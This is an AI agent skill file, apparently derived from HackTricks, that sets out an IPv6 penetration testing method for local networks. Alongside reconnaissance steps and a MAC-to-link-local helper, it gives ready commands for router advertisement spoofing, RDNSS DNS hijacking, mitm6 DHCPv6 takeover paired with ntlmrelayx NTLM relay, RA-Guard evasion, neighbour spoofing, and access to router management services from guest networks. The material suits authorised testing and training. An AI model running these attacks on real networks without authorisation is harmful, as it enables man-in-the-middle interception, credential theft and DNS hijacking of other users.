Hacktricks-skills ipv6-pentest

IPv6 penetration testing methodology for local network assessments. Use this skill whenever the user mentions IPv6 pentesting, network reconnaissance, link-local attacks, RA spoofing, DHCPv6 attacks, NDP discovery, or any IPv6 security testing. Trigger for tasks involving IPv6 address discovery, router advertisement manipulation, DNS hijacking via RDNSS, or guest network exploitation.

Install

Clone the upstream repo:

git clone https://github.com/abelrguezr/hacktricks-skills

Manifest: skills/generic-methodologies-and-resources/pentesting-network/pentesting-ipv6/SKILL.MD

Source content

IPv6 Penetration Testing

A comprehensive skill for conducting IPv6 security assessments on local networks. This skill covers reconnaissance, attack techniques, and defense validation for IPv6-enabled environments.

When to Use This Skill

Use this skill when:

  • Performing network reconnaissance on IPv6-enabled networks
  • Testing link-local attack vectors (RA spoofing, RDNSS, DHCPv6)
  • Discovering IPv6 addresses and topology
  • Assessing IPv6 security controls (RA-Guard, DHCPv6 Guard)
  • Exploiting exposed management services over IPv6
  • Validating IPv6 hardening configurations

Core Concepts

IPv6 Address Structure

IPv6 addresses are 128-bit addresses divided into:

  • Network Prefix (48 bits): Network segment identifier
  • Subnet ID (16 bits): Specific subnet within the network
  • Interface Identifier (64 bits): Unique device identifier

Key Address Types

Type            Prefix      Purpose
Link-Local      fe80::/10   Local network communication only
Unique Local    fc00::/7    Private networks (like 10.x.x.x)
Global Unicast  2000::/3    Public internet routing
Multicast       ff00::/8    One-to-many communication
Loopback        ::1         Internal host communication

Critical Multicast Addresses

  • ff02::1 - All nodes on local link
  • ff02::2 - All routers on local link
  • ff02::1:ffxx:xxxx - Solicited-node multicast

Reconnaissance Phase

Step 1: System Preparation

Before conducting IPv6 testing, harden your test system:

# Enable promiscuous mode for full packet capture
sudo ip link set dev <IFACE> promisc on

# Block rogue RAs and redirects to prevent self-poisoning
sudo sysctl -w net.ipv6.conf.all.accept_ra=0
sudo sysctl -w net.ipv6.conf.all.accept_redirects=0

# Increase limits for high-volume traffic
sudo sysctl -w fs.file-max=100000
sudo sysctl -w net.core.somaxconn=65535
sudo sysctl -w net.ipv4.tcp_tw_reuse=1

Step 2: Passive Discovery

Use the ipv6-sniffer.py script to map the network without sending packets:

python3 ipv6-sniffer.py -i <IFACE> -t 60

This captures:

  • Neighbor Solicitation/Advertisement (NS/NA)
  • Router Solicitation/Advertisement (RS/RA)
  • DHCPv6 messages
  • MLD reports

Step 3: Active Discovery

# Ping multicast to trigger neighbor discovery
ping6 -I <IFACE> -c 5 ff02::1 > /dev/null 2>&1

# View discovered neighbors
ip -6 neigh

# Alternative: use alive6
alive6 <IFACE>

Step 4: Derive Link-Local from MAC

Given a MAC address, construct the link-local IPv6:

  1. Convert MAC to hex groups: 12:34:56:78:9a:bc → 1234:5678:9abc
  2. Insert fffe: 1234:56ff:fe78:9abc
  3. Invert 7th bit of first octet: 1234 → 1034
  4. Prepend fe80::: fe80::1034:56ff:fe78:9abc

Use the mac-to-ipv6.py script for automation.
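The four steps above are the modified EUI-64 construction from RFC 4291. The following is an added example, not the bundled mac-to-ipv6.py script: it implements the MAC-to-link-local derivation, the reverse mapping (useful when a passive capture shows EUI-64 addresses and you want the vendor OUI), and, going beyond the steps above, the solicited-node multicast group ff02::1:ffxx:xxxx that each address joins. The MAC addresses used are constructed sample values.

```python
"""Modified EUI-64 helpers: MAC -> link-local, link-local -> MAC, and the
solicited-node multicast group an address joins.  Added example; not the
bundled mac-to-ipv6.py script."""
import ipaddress
import re

FE80 = int(ipaddress.IPv6Address("fe80::"))
SOLICITED_NODE = int(ipaddress.IPv6Address("ff02::1:ff00:0"))


def mac_to_iid(mac: str) -> bytes:
    """Steps 1-3: build the 8-byte modified EUI-64 interface identifier."""
    octets = bytes.fromhex(re.sub(r"[^0-9a-fA-F]", "", mac))
    if len(octets) != 6:
        raise ValueError(f"not a 48-bit MAC address: {mac!r}")
    # Step 2: split OUI and NIC halves and insert ff:fe between them.
    iid = bytearray(octets[:3] + b"\xff\xfe" + octets[3:])
    # Step 3: flip the universal/local bit (7th bit of the first octet, 0x02).
    iid[0] ^= 0x02
    return bytes(iid)


def mac_to_link_local(mac: str) -> str:
    """Step 4: prepend fe80::/64 to the interface identifier."""
    return str(ipaddress.IPv6Address(FE80 | int.from_bytes(mac_to_iid(mac), "big")))


def link_local_to_mac(addr: str):
    """Reverse mapping for EUI-64 derived addresses.  Returns None for
    privacy/random interface identifiers, which lack the ff:fe marker."""
    packed = ipaddress.IPv6Address(addr.split("%", 1)[0]).packed  # drop zone index
    iid = bytearray(packed[8:])
    if iid[3:5] != b"\xff\xfe":
        return None
    iid[0] ^= 0x02
    return ":".join(f"{b:02x}" for b in iid[:3] + iid[5:])


def solicited_node_multicast(addr: str) -> str:
    """ff02::1:ffXX:XXXX: the low 24 bits of the unicast address appended
    to ff02::1:ff00:0 (this is the group a Neighbor Solicitation targets)."""
    low24 = int(ipaddress.IPv6Address(addr.split("%", 1)[0])) & 0xFFFFFF
    return str(ipaddress.IPv6Address(SOLICITED_NODE | low24))


if __name__ == "__main__":
    # Constructed sample MACs, in both common separator styles.
    for mac in ("12:34:56:78:9a:bc", "00-11-22-33-44-55"):
        ll = mac_to_link_local(mac)
        print(f"{mac} -> {ll} -> back to {link_local_to_mac(ll)}; "
              f"solicited-node group {solicited_node_multicast(ll)}")
```

The zone index (%<IFACE>) is stripped before parsing so the helpers accept addresses copied straight out of `ip -6 neigh`.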

Step 5: DNS Reconnaissance

# Query AAAA records
dig AAAA <domain>

# Attempt zone transfer
dig AXFR @<nameserver> <domain>

# Broad ANY query
dig ANY <domain>

Attack Techniques

Router Advertisement (RA) Spoofing

RA spoofing hijacks the default gateway by sending forged Router Advertisements more frequently than the legitimate router.

Prerequisites:

  • Same /64 segment as targets
  • Ability to send packets on the interface

Execution:

python3 ra-spoof.py -i <IFACE> -m <YOUR_MAC> --llip fe80::dead:beef --interval 5

To forward traffic after winning:

sudo sysctl -w net.ipv6.conf.all.forwarding=1
sudo ip6tables -A FORWARD -i <IFACE> -j ACCEPT
sudo ip6tables -t nat -A POSTROUTING -o <IFACE> -j MASQUERADE

To revert the attack:

python3 ra-spoof.py -i <IFACE> -m <YOUR_MAC> --llip fe80::dead:beef --revert

Understanding RA Flags

Inspect legitimate RAs to determine attack vectors:

sudo tcpdump -vvv -i <IFACE> 'icmp6 and ip6[40]==134'

Flag      Meaning                   Attack Implication
M=1       DHCPv6 for addresses      DHCPv6 spoofing viable
O=1       DHCPv6 for other config   DNS hijacking via DHCPv6
M=0, O=0  Pure SLAAC                Use RDNSS spoofing instead

Router Preference (Prf):

  • High (10): Clients prefer this router
  • Medium (01): Default
  • Low (00): Last resort

RDNSS (DNS) Spoofing

For SLAAC-only networks (M=0, O=0), use RDNSS to hijack DNS:

python3 rdns-spoof.py -i <IFACE> --llip fe80::dead:beef --dns <YOUR_DNS_IP> --interval 5

To revert:

python3 rdns-spoof.py -i <IFACE> --llip fe80::dead:beef --dns <YOUR_DNS_IP> --revert

DHCPv6 Spoofing with mitm6

When M or O flags are set, use mitm6 for DHCPv6-based attacks:

# DNS takeover without rogue RAs
sudo mitm6 -i <IFACE> --no-ra -d <domain> --host-allowlist <host>

# Pair with NTLM relay
sudo ntlmrelayx.py -6 -t ldaps://<target> -wh <wpad_server>

RA-Guard Evasion

If standard RA spoofing is blocked, try evasion techniques:

# Hop-by-Hop header variant
sudo atk6-fake_router6 -H <IFACE> 2001:db8:1337::/64

# Fragmentation variant
sudo atk6-fake_router6 -F <IFACE> 2001:db8:1337::/64

# Destination options variant
sudo atk6-fake_router6 -D <IFACE> 2001:db8:1337::/64

# Flooded variant with DHCPv6 flags
sudo atk6-flood_router26 -F -m <IFACE>

Guest Network Management Exploitation

Many routers expose management services on guest SSIDs:

Discovery:

# Send Router Solicitation
python3 - <<'PY'
from scapy.all import *
send(IPv6(dst='ff02::2')/ICMPv6ND_RS(), iface='<IFACE>')
PY

# Or use rdisc6
rdisc6 <IFACE>

Exploitation:

# SSH to management interface
ssh -6 admin@[fe80::1%<IFACE>]

# Web UI access
curl -g -6 -k 'http://[<ROUTER_IP>]/'

# Service sweep
nmap -6 -sS -Pn -p 22,23,80,443,7547 [<ROUTER_IP>]

Defense Validation

Check for RA-Guard

# Attempt normal RA spoofing
python3 ra-spoof.py -i <IFACE> -m <MAC> --llip fe80::dead:beef

# If blocked, try evasion variants
sudo atk6-fake_router6 -H <IFACE> 2001:db8:1337::/64

Check for DHCPv6 Guard

# Attempt DHCPv6 spoofing
sudo mitm6 -i <IFACE> --no-ra -d test.local

# Monitor for responses
sudo tcpdump -i <IFACE> 'udp port 546 or udp port 547'

Check for ND Inspection

# Attempt NS/NA spoofing
sudo arpspoof6 -i <IFACE> -t <TARGET> <GATEWAY>

# Monitor for detection
sudo tcpdump -i <IFACE> 'icmp6'

Best Practices

  1. Always test in a lab first - IPv6 behavior varies by OS and network equipment
  2. Document baseline behavior - Capture legitimate RAs before attacking
  3. Use allowlists - Scope attacks to specific hosts/domains to reduce noise
  4. Clean up properly - Always revert attacks with lifetime=0
  5. Monitor for detection - Watch for RA-Guard or IDS responses
  6. Validate client support - Not all OSes support RDNSS or respond to DHCPv6

Common Pitfalls

  • Self-poisoning: Always set accept_ra=0 before testing
  • Zone index required: Link-local connections need the %<IFACE> suffix
  • Firewall interference: Stop ufw/iptables before testing
  • Client OS differences: Windows, Linux, macOS handle IPv6 differently
  • RA-Guard false positives: Some switches filter legitimate traffic

References

Scripts

The following scripts are bundled with this skill:

  • ipv6-sniffer.py - Passive NDP/DHCPv6 traffic capture
  • ra-spoof.py - Router Advertisement spoofing
  • rdns-spoof.py - RDNSS DNS hijacking
  • mac-to-ipv6.py - MAC to link-local IPv6 conversion

Run each script with --help for usage details.